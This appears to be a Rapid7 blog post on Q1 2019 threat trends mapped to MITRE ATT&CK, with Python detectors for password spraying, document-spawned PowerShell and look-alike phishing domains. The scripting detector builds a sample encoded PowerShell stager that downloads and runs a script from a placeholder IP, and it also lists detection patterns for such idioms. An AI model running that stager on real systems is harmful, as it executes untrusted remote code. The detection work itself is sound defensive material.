Rapid7 recently released the Q1 edition of our Quarterly Threat Report, which is fueled by findings from our managed detection and response service team, incident response service engagements, and our internet-scale projects Sonar and Heisenberg. Each quarter, we aim to offer a broad perspective on the threat landscape, then home in on threats specific to your industry or organization size. You can see all of our previous reports here.
What’s unique about this quarter’s report is that all investigated incidents have been mapped back to the MITRE ATT&CK™ framework. ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a curated knowledge base of the tactics and techniques adversaries have been observed using in real intrusions, from initial access through the later stages of an attack. It gives blue teams and SOCs a common vocabulary for evaluating which behaviors their defenses actually detect. To learn more, check out our three-minute Whiteboard Wednesday on MITRE ATT&CK.
This table from the report maps our Q1 volume of Rapid7 Managed Detection and Response (MDR) incidents (detected by our cloud SIEM, InsightIDR) to the MITRE ATT&CK framework.
Note: “Exfiltration” as a column is omitted, as there were no technique detections for that phase.
Since 90% of the alerts generated by InsightIDR occurred at or before the Credential Access phase, this post focuses on those critical early phases of the attack chain, the ones that precede data theft and breach.
Three familiar categories of adversarial tactics stand out:
- External remote services
- Scripting
- User interface spoofing
External remote services
Remote entry, which covers authentications from multiple countries, authentications to critical assets from new sources, and attempted ingress from disabled accounts, has been a fixture atop the threat list in most of our quarterly reports. An unfortunate number of credentials are compromised simply by guessing obvious passwords or working through known password-spray lists. Citrix recently revealed that international cybercriminals had intermittent access to its systems for as much as six months, with password spraying as the suspected initial point of entry. Make sure you’re monitoring the authentication events you care about, whether that means users connecting to your VPN or logins to your IaaS and PaaS environments, and that those events actually raise alerts rather than just landing in a log.
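The four remote-entry patterns above are all detectable from ordinary authentication telemetry. The following is an added example, not InsightIDR or any other Rapid7 code: it runs simple versions of each detection (password spray from one source, logins from two countries inside an hour, any attempt from a disabled account, and a successful login to a critical asset from a source never seen for that user) over a constructed set of sample events. The field names, thresholds, the per-user baseline and the list of critical assets are all assumptions for the example; map your own VPN, IdP or cloud console logs onto them.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample authentication events (not real telemetry). Field names are
# assumed for this example: ts (UTC), user, src_ip, country, result, asset, account_enabled.
SAMPLE_EVENTS = [
    # Password spray: one source, many users, one failure each, within a few minutes.
    *[{"ts": f"2019-03-01T02:0{i}:00Z", "user": u, "src_ip": "203.0.113.7", "country": "DE",
       "result": "fail", "asset": "owa", "account_enabled": True}
      for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])],
    # Attempted ingress from a disabled account.
    {"ts": "2019-03-01T02:07:00Z", "user": "mallory", "src_ip": "203.0.113.7", "country": "DE",
     "result": "fail", "asset": "owa", "account_enabled": False},
    # Successful authentications for one user from two countries inside an hour.
    {"ts": "2019-03-01T09:00:00Z", "user": "alice", "src_ip": "198.51.100.5", "country": "US",
     "result": "success", "asset": "owa", "account_enabled": True},
    {"ts": "2019-03-01T09:30:00Z", "user": "alice", "src_ip": "203.0.113.9", "country": "DE",
     "result": "success", "asset": "owa", "account_enabled": True},
    # Successful login to a critical asset from a source never seen for that user.
    {"ts": "2019-03-01T10:00:00Z", "user": "bob", "src_ip": "192.0.2.44", "country": "US",
     "result": "success", "asset": "vpn-gw", "account_enabled": True},
    {"ts": "2019-03-01T10:05:00Z", "user": "carol", "src_ip": "198.51.100.20", "country": "US",
     "result": "success", "asset": "vpn-gw", "account_enabled": True},
]

# Assumed baseline of known source IPs per user and the set of assets we call critical.
KNOWN_SOURCES = {"bob": {"198.51.100.10"}, "carol": {"198.51.100.20"}}
CRITICAL_ASSETS = {"vpn-gw", "aws-console"}


def _ts(event):
    return datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ")


def password_spray_sources(events, min_users=5, window=timedelta(minutes=15)):
    """Sources whose failed logins touch at least min_users distinct accounts within window."""
    by_src = defaultdict(list)
    for e in events:
        if e["result"] == "fail":
            by_src[e["src_ip"]].append(e)
    hits = set()
    for src, evs in by_src.items():
        evs.sort(key=_ts)
        for i, start in enumerate(evs):
            users = {x["user"] for x in evs[i:] if _ts(x) - _ts(start) <= window}
            if len(users) >= min_users:
                hits.add(src)
                break
    return sorted(hits)


def multi_country_logins(events, window=timedelta(hours=1)):
    """Users with consecutive successful logins from different countries within window."""
    by_user = defaultdict(list)
    for e in events:
        if e["result"] == "success":
            by_user[e["user"]].append(e)
    hits = set()
    for user, evs in by_user.items():
        evs.sort(key=_ts)
        for a, b in zip(evs, evs[1:]):
            if a["country"] != b["country"] and _ts(b) - _ts(a) <= window:
                hits.add((user, a["country"], b["country"]))
    return sorted(hits)


def disabled_account_attempts(events):
    """Any authentication attempt, successful or not, against a disabled account."""
    return sorted({(e["user"], e["src_ip"]) for e in events if not e["account_enabled"]})


def new_source_to_critical(events, known=KNOWN_SOURCES, critical=CRITICAL_ASSETS):
    """Successful logins to critical assets from a source outside the user's baseline."""
    return sorted({(e["user"], e["src_ip"], e["asset"]) for e in events
                   if e["result"] == "success" and e["asset"] in critical
                   and e["src_ip"] not in known.get(e["user"], set())})


if __name__ == "__main__":
    for name, fn in [("password spray", password_spray_sources),
                     ("multi-country", multi_country_logins),
                     ("disabled account", disabled_account_attempts),
                     ("new source to critical asset", new_source_to_critical)]:
        print(f"{name}: {fn(SAMPLE_EVENTS)}")
```

The spray rule keys on the source rather than the account because a spray deliberately stays under per-account lockout thresholds; the disabled-account rule fires on any attempt, since no legitimate user should be presenting those credentials at all. Real deployments would replace the static baseline with one learned from a trailing window of successful logins.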
Scripting
Attackers use scripting as the lighter fluid that sparks malware delivery, persistence, and defense evasion. Scripts universally speed up manual tasks and commands; used maliciously, scripts embedded in phishing attachments, PDFs, and Office documents carry the attacker to the next stage of the chain. For example, in the notorious DNC breach, the intruders used PowerShell scripts as a surreptitious way to introduce malicious code into the environment while blending in with legitimate administrative activity.
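Two signals catch most of the document-borne scripting described above: a script host being spawned by a document viewer, and an encoded or obfuscated command line that fetches or evaluates further code. The following is an added example, not Rapid7 code, that runs both checks over constructed process-creation events (Sysmon Event ID 1 style fields; the field names, the application lists and the regular expression are assumptions for the example). It also builds and decodes a real PowerShell -EncodedCommand argument, which is base64 over UTF-16LE rather than plain UTF-8, a detail that trips up many home-grown decoders.

```python
import base64
import re

# Constructed stager payload for the sample event below (not from any real incident).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage2.ps1')"


def encode_ps(command):
    """Build an -EncodedCommand argument the way PowerShell expects it: base64 of UTF-16LE."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


# Constructed process-creation events (Sysmon Event ID 1 style; field names assumed).
SAMPLE_PROCESSES = [
    {"id": 1, "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc " + encode_ps(STAGER)},
    {"id": 2, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\backup.ps1"},
    {"id": 3, "parent": "AcroRd32.exe", "image": "wscript.exe",
     "cmdline": "wscript.exe //B C:\\Users\\u\\AppData\\Local\\Temp\\invoice.js"},
    {"id": 4, "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

# Assumed lists: applications that open attachments, and script hosts they should not spawn.
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
# Download-and-evaluate idioms and a hidden window; assumed pattern, extend to taste.
SUSPICIOUS = re.compile(
    r"downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string|-w\s+hidden",
    re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if there is none.

    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...), so
    match prefixes rather than the full name.
    """
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        t = tok.lstrip("-/").lower()
        if t and "encodedcommand".startswith(t):
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def suspicious_scripting(events):
    """Return (id, reasons, decoded_command) for each event that trips a rule."""
    findings = []
    for e in events:
        reasons = []
        parent, image = e["parent"].lower(), e["image"].lower()
        if parent in DOCUMENT_APPS and image in SCRIPT_HOSTS:
            reasons.append(f"{image} spawned by {parent}")
        decoded = decode_encoded_command(e["cmdline"])
        if decoded is not None:
            reasons.append("encoded command")
        # Look at both the raw command line and the decoded payload, if any.
        if SUSPICIOUS.search(e["cmdline"] + " " + (decoded or "")):
            reasons.append("download/eval or hidden-window pattern")
        if reasons:
            findings.append((e["id"], reasons, decoded))
    return findings


if __name__ == "__main__":
    for event_id, reasons, decoded in suspicious_scripting(SAMPLE_PROCESSES):
        print(event_id, reasons, decoded)
```

Event 2 is deliberately left alone: -ExecutionPolicy Bypass on its own is so common in administrative scripts that alerting on it alone drowns the SOC. The parent/child relationship is the stronger signal, and it survives any amount of payload obfuscation.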
User interface spoofing
This tactic is high on the list, especially as phishing remains a top threat. Malicious actors often gain access to organizations by baiting employees into giving up credentials. Look-alike login pages that mimic real sites let attackers harvest credentials and gain an initial foothold on webmail or cloud services, from which they work toward internal network access. Well-crafted phishing campaigns were widely credited as the first domino in the WannaCry ransomware outbreak of 2017, although the worm itself spread through the EternalBlue SMB exploit rather than through user interaction, and phishing campaigns continue to inundate organizations of all industries and sizes today. (While an official statement from the city is still pending, analysts speculate that the recent Baltimore ransomware attack was triggered by EternalBlue introduced via a phishing campaign.)
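Look-alike login pages live on look-alike domains, and those can be checked mechanically before a user ever sees them, whether in a mail gateway, a proxy log or a newly registered domain feed. The following is an added example, not Rapid7 code: given an assumed list of protected domains, it classifies URLs by undoing the usual tricks (digit-for-letter and rn-for-m substitutions, IDN homoglyphs hidden behind punycode, the brand used as a subdomain of an unrelated registrable domain) and then by edit distance. The protected list, the sample URLs and the homoglyph table are constructed for the example; the two-label "registrable domain" rule is a deliberate simplification that a real deployment would replace with a public suffix list.

```python
import unicodedata
from urllib.parse import urlsplit

# Assumed list of domains whose login pages we want to protect.
PROTECTED = ["example.com", "example.net"]

# Constructed URLs as they might appear in phishing mail (not real sightings).
SAMPLE_URLS = [
    "https://login.example.com/owa/",                                 # legitimate
    "https://examp1e.com/login",                                      # digit for letter
    "http://exarnple.com/owa/auth.aspx",                              # rn for m
    "https://example.com.account-verify.net/signin",                  # brand as subdomain
    "https://" + "exämple.com".encode("idna").decode("ascii") + "/",  # IDN homoglyph as punycode
    "https://totally-unrelated.org/",                                 # no match
]

# Assumed substitution table; order matters (multi-character entries first).
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("|", "l")]


def registrable(host):
    """Crude registrable domain: the last two labels (assumption; use a public suffix list)."""
    return ".".join(host.split(".")[-2:])


def normalize_host(host):
    """Fold a hostname to the ASCII string a human would read it as."""
    host = host.lower().rstrip(".")
    try:
        host = host.encode("ascii").decode("idna")   # xn-- labels back to Unicode
    except UnicodeError:
        pass
    host = unicodedata.normalize("NFKD", host)       # split accented letters into base + mark
    host = "".join(c for c in host if not unicodedata.combining(c))
    for glyph, plain in HOMOGLYPHS:
        host = host.replace(glyph, plain)
    return host


def levenshtein(a, b):
    """Edit distance between two strings (standard dynamic-programming version)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(url, protected=PROTECTED, max_distance=2):
    """Return 'legitimate', 'no match', or a short reason the URL looks like a protected domain."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    reg = registrable(host)
    if reg in protected:
        return "legitimate"
    norm_reg = registrable(normalize_host(host))
    for p in protected:
        brand = p.split(".")[0]
        if norm_reg == p:
            return f"look-alike of {p}"
        if brand in host.split("."):
            return f"{brand} used as subdomain of {reg}"
        if levenshtein(norm_reg, p) <= max_distance:
            return f"within {max_distance} edits of {p}"
    return "no match"


def scan(urls):
    return [(url, classify(url)) for url in urls]


if __name__ == "__main__":
    for url, verdict in scan(SAMPLE_URLS):
        print(f"{verdict:45s} {url}")
```

The exact-match check runs before normalization on purpose: a genuine login.example.com must never be reported as a look-alike of itself, while examp1e.com must be, even though both normalize to the same string.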
While the prevalence of these tactics is alarming, the good news is that these fundamental techniques are well understood, and you have powerful tools at your disposal to stop attackers early in the attack chain. A tested threat detection program, together with employee education and awareness training around passwords and phishing, is a critical first step in defending your organization against these common techniques.
To learn more about the threats our team saw in the wild in Q1 2019, read the full Threat Report.